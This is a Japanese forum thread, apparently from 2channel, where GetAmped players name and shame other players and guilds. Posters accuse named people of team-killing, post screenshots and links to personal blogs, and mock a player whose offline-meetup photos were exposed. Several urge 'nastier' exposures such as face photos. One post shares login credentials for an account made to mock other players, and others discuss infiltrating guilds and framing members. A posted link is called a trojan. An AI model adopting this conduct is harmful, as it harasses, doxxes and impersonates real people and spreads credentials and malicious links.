272 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 22:49:50 ID:/I/LrTqg
>>270
性格とか性格


273 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 23:22:33 ID:Megxd9OC
初めまして質問ですがEZというギルドに入りたいのですがどのようにすればいいんでしょうか
募集とかしてなさそうなので誰かいい方法あったら教えてください

274 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 23:23:39 ID:fIKHuN/q
ギルマスのKに股開けば今すぐにでも

275 :名無しさん@ゴーゴーゴーゴー!:2006/12/30(土) 23:48:33 ID:N7zqbvdf
>>274
不覚にもワラタ

276 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 00:04:12 ID:uOLTu3yI
アンプドマンすげー

「じゃ最後自分ガチスタイルやって落ちます」

すぐ落ちろよwww

277 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 00:32:20 ID:QgdM9fPI
しかしあれだな 
 MR.ADULTてギルドは自分を厨房と切り離し 大人ぶり
たいんだなwこういうのって大抵精神的に厨房卒業した
ての大学生あたりだろうな 
  例)アンプドマン ジャガペさん etc・・・

ついでに こういう部類の奴らって、消防・厨房の
ロビーでの雑談止めた日にゃ優越感がたまらんらしいぞ?
 

278 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 02:33:27 ID:CrkKcPOi
ロビーのデッドヒートおもすれー(^ω^)

279 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 06:31:18 ID:e0snXcsw
>>274
上手いな。

280 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 08:26:03 ID:CaoIWX8o
アンプドマンやジャガベが大学生・・・う、嘘だろ?

281 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 11:08:07 ID:PAl+fbds
>>280
アンプド男は高校生
ジャガベは厨房

282 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 11:46:12 ID:9wZt7Xry
アンプドマン高校生?
ずっと中学生かそれ未満だと思ってたんだけど

283 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 12:09:45 ID:zo6b+uqI
>>282
よう俺

284 :ジャガぺ:2006/12/31(日) 12:13:28 ID:PIIFMR8U
高校生ってこんなもんなんだ
俺高校生だけど

285 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 13:02:19 ID:DxObd29A
アンプド男は厨房。
身内の俺が言うんだからガチ。

286 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 13:41:45 ID:PAl+fbds
>>285
おまいが誰だか気になる。

287 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 13:41:50 ID:QgdM9fPI
精神と実際の年齢は切り離せや
  すくなくともジャガペは大学生だ 
  心は厨房↓だが

288 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 16:25:18 ID:MWPTf+xO
うほ

289 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 17:02:18 ID:L+9KANN6
>>277
MR.ADULTってミスチルのくるみのプロモに出てきたのが元ネタだと思ってた


290 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 17:04:13 ID:L+9KANN6
sage忘れすまん

291 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 17:54:56 ID:lo+oJE7v
>>289
え 元ネタそれじゃないの?

292 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 19:37:15 ID:hr4gMGzb
こんばんわ、年の瀬です。
今回は、年末ということでGETAMPED内特に目立ったユーザーを決めようと思います。

http://tonosiki.mbnsk.net/pathos/gavote/votec.cgi?no=0
上のアドレスから入りまして、自分が一番印象に残ったユーザー(正確に入力)をお書き投票してください。

投票数が最も多い方は結果発表で公表いたし、素敵なことがまっております。
投票開始は19:30分 終了予定が23:00でございます。

23:00を回りましたら発表いたします。
それでは、よろしくお願いいたします。

293 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 19:59:14 ID:hr4gMGzb
IP規制かけておきましたので、連続投票のほうを制限いたしました。
再度よろしくお願いいたします。



294 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 21:09:21 ID:vb5gLuGW
>>293
お前はなんでそうやってわざわざスレに沸いてくるの?

295 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 21:51:14 ID:WYCNg0xY
高校生でも大学生でも、小学生〜高校の生活ぶりで精神的にも大きく違うからな
ずっとゲームばっかやって引きこもって陰気に過ごしてきた奴は、高校生や大学になっても考え方は丸っきり成長していない


296 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 22:34:39 ID:sbix7QpI
いま紅白のDJオズマ
おっぱいもろだしじゃなかった?
俺目が悪いから見えなかったよ

297 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 22:36:46 ID:xcYsfRW7
女もろだしだったなw

298 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 23:42:03 ID:sbix7QpI
NHKなのにw

299 :名無しさん@ゴーゴーゴーゴー!:2006/12/31(日) 23:54:40 ID:pCNy5hWf
しかし、何で公式のスキンスレで、要望スキンは全部版権物ばかりなんだ?
ほんとバカばっかだな・・・

300 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 01:07:38 ID:IKlmi7ON
>>297
Tシャツに決まってるだろww

301 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 09:21:12 ID:0UKUwwpN
http://www.web-empires.net/online/set3.html
 名前/クロロア
見出し/プレイヤーの質が・・・

評価 (0)
プレイ期間=1ヶ月
感想=
1.ゲーム内にいるプレイヤーの質が低すぎる(暴言飛び交い過ぎ)
2.サブアカウント使ってるやつ多すぎ
3.新参より古参のほうが圧倒的に多い(今からじゃ古参に勝つのは難しい)
4.GMの対応が悪い
5.とにかく最悪


302 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 11:55:48 ID:MPdO1Fxf
   こいつは・・・
     ↓
http://kazehiita.blog58.fc2.com/

303 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 15:43:27 ID:IR2zESVV
スパイダーナイト

頼むから始まる前にトイレ行くの止めて欲しい。。。

先に行って来て下さい。




お前のウンコ待たせるんじゃねぇよwwwww



こいつクサイからkick推奨な。

304 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 16:09:52 ID:u2M7EI1e
俺と俺の知り合いと俺のギルドのメンバー以外全員うぜーし

305 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 16:16:30 ID:x8i6qUzO
>>304
それはエゴだよw!

306 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 16:48:18 ID:IAJlxZ1i
SEVEN

タイマン部屋で自分が勝った回数だけ部屋名に書き
負けた回数は書か変えない勝率厨
自分が勝てた相手には「もっとやろ」と言い
負けた相手にはキックする痛い香具師

307 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 17:18:12 ID:Xo/vBJxz
>>306
特定した

308 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 17:21:11 ID:WV+jZG62
トナリのオヤジ

こいついきなりTKしてくる。

こいつの部屋には入らないように。

http://www.uploda.org/uporg639104.jpg



309 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 17:39:41 ID:cXJ0OCPV
>>308
ウィキペディアに書いてあったよ、それ

310 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 18:39:14 ID:HwqO4irm
今気付いた
ビガーズうぜぇwwwwwww

311 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 19:15:30 ID:Ov+Le8Iq
エルシールって厨房(消防)が痛いんだが
自分の事「うち」って呼ぶんだ
女のガキでも厨房脳ているのか?


312 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 19:39:57 ID:AHCG3IHM
俺から見るとエルシールは男に見える。

313 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 19:47:35 ID:q1wsLojY
中2のネカマと予想

314 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 21:08:37 ID:vlb8sBKR
ぶっちゃけるとエルシールを知らない

315 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 21:22:23 ID:s3FDKPZe
馬鹿だな、「ウチ」はどう考えてもネカマだろ

316 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 21:43:29 ID:EybNqJak
一人称が変わってるだけで晒されるんですか^^;

317 :名無しさん@ゴーゴーゴーゴー!:2007/01/01(月) 21:50:23 ID:KMrcMYYQ
インペリアルは厨ネカマの巣窟ですね

318 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 00:53:22 ID:Lxp83iQ+
鼻糞

最凶のTK野郎

本人曰く「おれを見たら即効で蹴ってくれ」

http://up2.viploader.net/pic/src/viploader385733.jpg

319 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 08:36:49 ID:9QzcwOEk
>>318
そんなの撮ってないでTK現場撮れや馬鹿が

320 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 09:51:36 ID:Czh/qH7P
>>319
TKされた後にSC撮っても意味ないだろうが
お前、池沼だろww

321 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 11:23:57 ID:IlS8FISN
CoCo

TKしても謝罪なし
早死確定になると落ち逃げ

322 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 12:27:57 ID:W5D6B/2t
インペリアル潜入中
なんかおもしろいネタ見つけたら晒す。

323 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 12:36:06 ID:4g06nlPB
>>321
禿同!

こいつ何もしゃべらないけど、もしかしてジンガイか?

324 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 12:47:34 ID:sWEB7hY7
>>322
おまい特定されんじゃね?

325 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 13:11:44 ID:W5D6B/2t
>>324
ん〜、大丈夫と思う。
違うメンバー追放して、追放された奴が怒るってのもよさそうだが。

326 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 14:52:42 ID:GvJ27yff
>>323
同じ潜入者としてアドバイスするが違うメンバーに容疑がかかるようにしないと後々面倒になるかもしれないから気をつけろ

327 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 15:00:58 ID:jcm+IuKA
というかそういうレスする時点でもう駄目
そのの中にはこのスレを見ているやつもいるだろうし
潜入は普通避難所的なものを作るもの

まぁ潜入中を途中でバラすってことはただ目立ちたいだけなんだろうけど

328 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 15:15:55 ID:GvJ27yff
>>327
まあ、結果を待とうやw

329 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 15:56:41 ID:a/wyEoO/
俺もいもむしかnightmareあたりに入ってみようかな

330 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 16:20:26 ID:Y2FPRnvc
潜入員が特定されてない時点で潜入員もマトモじゃない事に気づけ

331 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 16:20:41 ID:FXf0/IV8
Club "Secross"っていうギルド危ないな、アイコンにしてもメンバーにしても

332 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 16:40:02 ID:GvJ27yff
>>329
nightmareは内部崩壊起こしているからいまさら入っても面白いことはない
どうせならnightmare分子が大量に居るPathos希望

333 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 17:22:14 ID:GmOqOwE8
>>332
Pathos団員がきましたよ

334 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 18:39:49 ID:Y2FPRnvc
http://up2.viploader.net/pic/src/viploader385977.png
バネ1戦目・・・勝ち
2戦目・・・負け
3戦目・・・負け
→負け惜しみ「ベストな力が出せれば|Д゚)」
坂本1戦目・・・勝ち
2戦目・・・勝ち
3戦目・・・負け
→勝ち誇り「いいえ別に(*^^)」


335 :sage:2007/01/02(火) 18:40:03 ID:UV3RlwLp
工作員かよ

336 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 18:44:01 ID:GmOqOwE8
ロイクスが鎌使ってる

337 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 18:51:25 ID:UV3RlwLp
roikusu@gmail.comにみんなメール送ってね^^
         
                  byロイクス

338 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 18:53:10 ID:T0vyYOsG
つーいにわがギルドも晒されたか









イインジャネ?


339 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 19:11:14 ID:yFMgspyT
腐乱死体とかの
「僕GA強いでちゅよwww」レベルなアホな人たちって
すぐ落ち逃げしやがる。
大して強くもないくせに・・・

340 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 19:21:48 ID:JIqAWh72
ジョジョ

って人にTKされた;;

341 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 19:52:50 ID:4g06nlPB
>>337
お前、釣られてるの分かんないのか?プゲラww

342 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 19:54:01 ID:OMzkYjWr
>>334
これは酷いな

343 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 20:20:39 ID:9QzcwOEk
>>337
それ、ロイクスじゃなくて口イクスなw

344 :名無しさん@ゴーゴーゴーゴー!:2007/01/02(火) 20:31:29 ID:1y1RyvSK
>>334
坂本ジュリエッタ:ha?

に吹いたwww

345 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 00:36:06 ID:dbgYo9nK
ロノロアゾロのHP

ttp://www.geocities.com/fuzoku_ou/

346 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 08:54:25 ID:NpQ2v3HG
>>345
トロイ

347 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 16:19:34 ID:Ef5ZA9nU
Marvelous

上級者なのにしつこくTKしてきた。ビビったよ・・・。

348 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 16:23:31 ID:yJcRy4gv
>>346
わざと踏んでみた ウィルスというよりブラクラに近いな
>>347
SSうpしる

349 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 16:37:55 ID:5Rp0hqse
>>347
ロイクスがマスターの部屋だから観戦してたけど、先ず最初に手を出してきたのは
Marvelousって奴だったな。それからその試合が終わるまで粘着TK。
コイツ、Ezってギルドの奴だっけ?

ギルドvs客開いたり、TKしたりといい印象はないな。

350 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 16:59:56 ID:yJcRy4gv
ビギ鯖の不審者Aての恐ろしく強いな。
少なくとも漏れじゃ勝てん

351 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 17:09:59 ID:8t4j+F5i
宣伝乙

352 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 17:22:43 ID:s6uqyT56
>>349
Ezではない

353 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 17:56:53 ID:zmFBiCPt
へらへら

354 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 19:10:09 ID:1ZT+qhCW
むたちに

355 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 20:15:10 ID:3GfQ22Mv
まーへらす

356 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 20:16:58 ID:sk2XUo2+
Ezって大して強いやついないやん

357 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 20:29:54 ID:ms+Svd7A
>>356
お前よりは皆強いよ

358 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 20:31:54 ID:rQoHi+OD
はいはい煽らない煽らない

359 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 21:12:41 ID:G6JTysTP
俺もその部屋みてたが、あいつのTKは酷かった・・・
さすが、EZだな

360 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 21:25:16 ID:VamH52gG
残念ながらEzじゃない

361 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 21:56:13 ID:G6JTysTP
だが、EZと仲がよいのは確かだよ。
流石にろくなやついないな。

362 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 21:57:19 ID:jqOWmnGT
mixiの奴ら皆Ezに入ればおk

363 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 22:02:35 ID:1ZT+qhCW
Ezの工作員も多いが
粘着してるのも何か固定のやつっぽいな

EzはどうでもいいけどMarvelousは確かにうざい
どの辺が
全部

364 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 22:18:15 ID:2MTmj8rZ
MarvelousってのはEzちゃうんか、なるほど。
でもまー、先に手を出してたな。

365 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 22:23:19 ID:ebX6ThLn
いやもうEZでいいよ

366 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 22:32:56 ID:Vh9m5vSu
へらへら

367 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 23:15:06 ID:9iyxaL+H
◆ギルド晒し祭り◆

【ギルド】こんにちは

【構成員】サバウト、ミサイルマン

http://www.uploda.org/uporg641315.jpg
http://up2.viploader.net/pic/src/viploader386831.jpg

ワッショイヽ(゚∀゚)メ(゚∀゚)メ(゚∀゚)ノワッショイ

368 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 23:32:40 ID:3EILcyrG
>>367
そいつらロビーで勧誘してたな

369 :名無しさん@ゴーゴーゴーゴー!:2007/01/03(水) 23:33:46 ID:3EILcyrG
鼻糞ってまだTKやってる?

370 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 01:42:17 ID:5buGLKPk
>>367
顔がw

371 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 07:15:09 ID:Xepdv7KU
消防・厨房ごときで騒ぐな

372 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 07:22:32 ID:EbW6tUSN
サバウトってアバウト田中の別垢?

373 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 11:22:14 ID:tB9RS/tq
アバウト田中

ミサイルマン

ポチFC


この3人はガチ。

374 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 11:35:05 ID:EtgNHVsz
>>373
よし、今からアバウトミサイルFCというなのキャラ作ってくるw

375 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 11:56:36 ID:0BFvU6cW
いり蔵=DJ鈴木?
死ねぼけ

376 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 11:58:04 ID:bOrbbOHh
>>374
よーし、作ってみろ

377 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 12:05:16 ID:EtgNHVsz
>>376
文字数が足りない・・・助けてw

378 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 12:09:14 ID:EtgNHVsz
文字数足りないからアバウトポチ作った
とりあえずID晒す
ID abauto
PW kusopoti

379 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 12:40:44 ID:b0dafwUE
それで垢作って何すんのよ
それ使って荒らしてたらポチとかと同レベル

380 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 12:53:48 ID:zWMGQiyC
んじゃ俺はポチ田中でw

381 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 13:03:35 ID:EtgNHVsz
今のロビー餌まいたら釣れる釣れるw

382 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 13:29:35 ID:0BFvU6cW
JokeRotu

383 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 15:51:42 ID:dKDW9LPr
>>375
別人だろ

384 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 18:46:52 ID:byrFYTe1
(´・ω)ノ[|_| ロイクス語録 |_|]ヽ(ω・`)

『申し訳けありませんでした反省しています』

『ちっこんなの偶然だ』

『卵〜〜〜〜〜((((((ノ゚听)ノあぁ〜〜〜〜〜((((((ノ゚听)ノ』

『あ』

『後ろのものついて来い』

『今から僕の力を見せてやるよ』

『なんだよ』

ちょwwwwwwおまwwwww 「申し訳け」って「け」はいらないだろw

http://up2.viploader.net/pic/src/viploader386831.jpg

385 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 18:57:09 ID:diSUeFnR
>>384

http://up2.viploader.net/pic/src/viploader387315.jpg

386 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 19:15:11 ID:+USbClwO
ポインタがかわいすぎる

387 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 19:42:19 ID:ZyxZ3zWK
>>385
http://up2.viploader.net/pic/src/viploader387353.jpg

388 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 20:04:57 ID:gwF+aqMm
タイタニック(ロイクス)
「今から僕の力をみせてやるよ」
橋だったので目の前の敵を始まった瞬間攻撃
が、仕様で攻撃当たらず。反応が遅い相手の攻撃ヒット。
ロイクスアボーン。
「ちっこんなの偶然だ」「申し訳けありませんでした反省しています」
この流れが多い

389 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 20:54:44 ID:n5sjh8s8
◆ギルド晒し祭り◆

【ギルド】ウズラEGGs

【構成員】ウズラ、ロイクス

http://up2.viploader.net/pic/src/viploader387409.jpg
http://up2.viploader.net/pic/src/viploader387410.jpg

ワッショイヽ(゚∀゚)メ(゚∀゚)メ(゚∀゚)ノワッショイ




390 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 21:32:39 ID:8piDPr6l
>>389
そんなんで”晒し”になんのか?

391 :サバウト:2007/01/04(木) 21:37:02 ID:2PG8tO06
ミサイルマンは俺の実兄。
弟の俺が言うのもなんだけどいい奴やねん。

お前らに頼みあんねんけど、俺ら兄弟を温かく見守ってくれへんか

392 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 21:56:29 ID:8piDPr6l
亀田は黙ってろ

393 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 23:35:59 ID:cgP1YVHr
こんにちはメンバーの僕が自ら晒し
多分メンバーもここ見てるから俺オワタ\(^o^)/

http://up2.viploader.net/pic2d/src/viploader2d177020.jpg



394 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 00:01:18 ID:DbbdO1gC
サブ垢に終わりも糞もあるのか?

395 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 00:52:20 ID:CMgTyaR6
ないな。
んなん糞みたいな晒しより、もっとエグい事を晒せよ。

例えば、鍵部屋での敵対するギルドへの文句。
オフ等であった顔写真。
エグいのを頼む。エグいのを。

396 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 01:15:36 ID:6rD8sN2n
ネヲチのローカルルールも読めない輩多過ぎ、出てけ

397 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 07:06:47 ID:YJ02Wh5U
ロイクスって見た感じただの餓鬼じゃないのか?
なんでここまで人気あるんだ?

398 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 08:53:49 ID:INMGobpU
雪だるまはいつ送られるの?

399 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 09:44:23 ID:uONHRRyA
俺おもろいからロイクスの船部屋ちょくちょく入ってるけど、あそこ8人とかいるのにあまりラグくないよな。

400 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 10:41:55 ID:lMhAwU1U
ロイクスは別に見てて面白いからいいけど
ポチFCのクズだけは許せん。

401 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 13:31:52 ID:zTWt9zwi
ロイクスと同類だからだよ

402 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 13:52:02 ID:lMhAwU1U
なるほど!

403 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 13:57:08 ID:8rO+3UZj
厨、消くらいスルーしろ
あの時期は誰でもあんなものだ。いい年なったときに思い出して赤面させておけばいい
それをスルーできないのは同じレベルの人間って事

404 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 14:32:53 ID:vO3SCEBF
厨、消くらいってレベルじゃねーぞ!

405 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 16:40:55 ID:yV2X1BM3
ふと思ったんだけど、>>347-366の間で>>347って何回ID変えてるの?
>>364とか見ると同一人物が別IDで書き込んでるのは分かるんだけど、
それに加えて書き込みの殆どが単発IDで全く信用できないんだが…

406 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 16:42:56 ID:uONHRRyA
はいはい掘り起こさない。

407 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 20:39:25 ID:s4/QgRXi
ロイクス様のお通りだ

http://www.uploda.org/uporg643370.jpg

( ´_ゝ`)(´<_`  )

408 :名無しさん@ゴーゴーゴーゴー!:2007/01/05(金) 23:22:22 ID:dGy9m9m0
>>405
本人乙 スルーした方が身のため

409 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 00:39:38 ID:cwMjxslH
http://up2.viploader.net/upphp/src/vlphp2161.png

げんさん大人気ですね

410 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 00:58:42 ID:1tMMFca1
醜面OFF会の写真晒されてコッソリブログ消してるな、げんw

411 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 07:28:29 ID:D455GT7T
これ以上リアル叩いてるともう知らんよ

412 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 08:51:21 ID:J9iqYbPi
このスレもう末期

413 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 09:53:00 ID:nSiSoEgx
ピカチュウって落ち逃げ常習犯か?

414 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 14:53:26 ID:BmH24Q+/
>>410
まだ見れるぞ?

415 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 16:53:17 ID:TfcaI/2V
末期ゲー

416 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 18:04:13 ID:Max+JiIL
暇つぶしゲー

417 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 18:48:04 ID:Y39hJ9SK
GMがついに試合放棄GA OWATA

418 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:15:06 ID:TfcaI/2V
仲間がみんな倒され1対4でオレスパイ
逃げ回りながら銃やアイテムを駆使し戦っていたら「逃げるな」「攻めてこい」と敵の古参達から批難轟々
しかたなく突っ込んで2人討ち取った所で散ったんだが、こういう時はどうすべきなんだ?

観戦が嫌いで早く戦いたいって仲間は、突っ込んで散って欲しいだろうし
観戦が好きでオレみたいに勝ちにこだわる仲間は、しぶとく戦って勝ちないしは引き分けて欲しいだろうし

空気読んでやっぱり死ぬべきなのか?


419 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:17:53 ID:jsU3EZAV
>>417
GMの仕事は試合じゃないだろ

420 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:22:36 ID:J5OF066M
>>418
そりゃ相手が悪い
晒しスレなんだから名前晒せ

421 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:32:57 ID:0jYojR9/
>>418
いいから、その古参とやらの名前を晒せよ。

422 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:35:46 ID:TU2NMb2H
GAからついにGM消えるらしいぞ 
 喜べ^^

423 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:40:57 ID:TfcaI/2V
>>420-421
晒したいのもやまやまだが、まだ一度もこのスレに名前が挙がっていない古参だし、オレを嫌っているだけで根は悪い奴じゃないだろうから、晒さないでおく
このスレを見ている古参だから、まぁ良い忠告にはなっただろう


424 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 19:52:16 ID:Max+JiIL
>>422
消防厨房の理解不能会話が延々と続くのか。
消えて喜ぶってことは、お前もソッチ側って事か

425 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 21:00:54 ID:5vpNQMea
http://iyomu.exblog.jp/
http://the24.exblog.jp/



426 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 22:59:09 ID:BSKaPEUs
>>418
特定しました

427 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 23:45:51 ID:5vpNQMea
http://www.uploda.org/uporg645122.jpg

たこぽんに1:1で勝利

右下にオフって表示されてくるのに意味不明な事を言い出す
たこぽん:アイテムonじゃないの?

画像のやり取り

たこぽん:マジで言ってる? 
とかわけのわからない発言連発
最後
たこぽん:反応が楽しかったよ
たこぽん:ノシ

部屋出た後ああ、あいつは1on1の意味理解してなかったんだなと無知だったと把握
変に紳士ぶってる割に中身はそこらの厨房と変わらないな
自分が無知だと気が付かず相手に非があると押し付ける
無知は怖いね

なーにが反応楽しかったよノシだwww

428 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 23:51:16 ID:OCGnJ5RO
>>427
ごめん、たこぽんって誰よ??

429 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 23:52:30 ID:Max+JiIL
たこぽんが厨房なのは、大体の奴が知ってると思うが。
あと、必死に見えるぞ。

430 :名無しさん@ゴーゴーゴーゴー!:2007/01/06(土) 23:55:07 ID:5vpNQMea
プロ鯖移住という妄想企画をロビーで騒ぎ散らしてた奴
ついでに量産型バカとか発言してたのをみかけたから きっとチャネラー
傍目から見てて痛い

431 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 00:07:28 ID:vOp1J7P+
http://www.uploda.org/uporg645143.jpg

お前ら、俺のこと忘れてない?

432 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 00:16:38 ID:Do0quJ17
>>431
わらた

433 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 01:01:22 ID:mAWom5DC
チャネラー…ね

434 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 01:04:10 ID:cXaWLcex
たこぽんは空気な読めない子

435 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 01:09:25 ID:Rg/7Yzo0
リアルの小中学生はまだまだ可愛いよ。
屑コテ共やポチFC等は死ぬべき。

436 :名無しさん@ゴーゴーゴーゴー!:2007/01/07(日) 01:17:05 ID:7wrOyKjM
